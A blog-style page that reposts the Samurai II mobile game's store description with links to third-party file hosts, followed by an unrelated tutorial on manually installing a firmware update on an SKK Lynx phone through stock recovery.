Samurai II sends Daisuke on a quest for revenge across the war-scorched countryside. From a seafaring village to a flying fortress to the legendary Isle of the Dead, the samurai will stop at nothing to hunt down his arch-enemy Orochi. Will he get his Vengeance?
FEATURES:
★ Intuitive virtual joystick ensures you’re slicing up baddies, not swiping the screen.
★ Dynamic camera finds the best perspective for each encounter, adding variety while keeping focused on the action.
★ Tense, quick and gory battle sequences!
- Battle hordes of on-screen enemies wielding new weapons and sporting unique abilities.
- Stay nimble and plan your attacks – roll out of harm’s way and eliminate ranged enemies like the Samurai Archer before they can strike.
★ Improved game play includes new features.
- Solve environmental puzzles, avoid dangerous traps, and discover useful items.
- The fight is on - not to worry, the combat never takes a back seat to platforming or fetch-quests.
★ RPG elements reward skilled players – upgrade the Samurai’s health, buy new attack combos and upgrade them to devastating levels.
★ Between levels, gorgeous anime-style comic panels tell the samurai’s tale with original hand-drawn artwork.
★ New survival mode pits the samurai against waves of enemies, giving hardcore players a score-attack mode to hone their skills. Two games in one!
★ Advanced AI system on par with console games. Goal Oriented Action Planning architecture is used in many PC, PS3, and Xbox 360 games.
★ Original soundtrack – in classic samurai movie style, soft music builds with the heat of battle.
*60 FPS only on capable devices.

What's New
Madfinger game classic polished and ready to rumble.
✔ Android TV support
✔ improved quality
✔ better performance on newest devices
Samurai II Screenshot 1
Samurai II Screenshot 2
Samurai II Screenshot 3
Samurai II Screenshot 4
Samurai II Screenshot 5
Samurai II Screenshot 6

DOWNLOAD HERE
TUSFILES
HUGEFILE
INDISHARE
USERSCLOUD


Credits:
Iamnumber25 


[TUT]UPDATE SKK LYNX VIA MANUAL UPDATE

[TUT]UPDATE  SKK LYNX VIA MANUAL UPDATE
Hello guys, I'm going to teach you again on how to update your SKK LYNX manually. Based on observation there's a lot of member can't update thru wireless. This update fixed the camera brightness and some other issues. So I made a tutorial on how to update it without hassle. If you are rooted make sure to full unroot your device. Also if you have custom recovery like CTR,CWM,TWRP,Philz Touch or etc. you need to reflash the stock recovery. To update please make sure you have atleast 30% remaining battery.


SKK LYNX UPDATE SETTINGS

Requirements:
non-rooted
stock recovery
Download: update.zip

Note: Do it at your own risk


1. Reboot go to your stock recovery. (Just press volume up and power on simultaneously).
2. Navigate to settings manual update then search update.zip in your sdcard.
Then wait to install...When installation succcessful pop up..Enjoy!
That's it..check your settings then about phone. (Current update is SKK_V1.3_20150324)

For wireless update follow this image below...
SKK LYNX UPDATE

Special thanks:
SKK LYNX
Danielle Cruz for tester
Me for the file and ideas..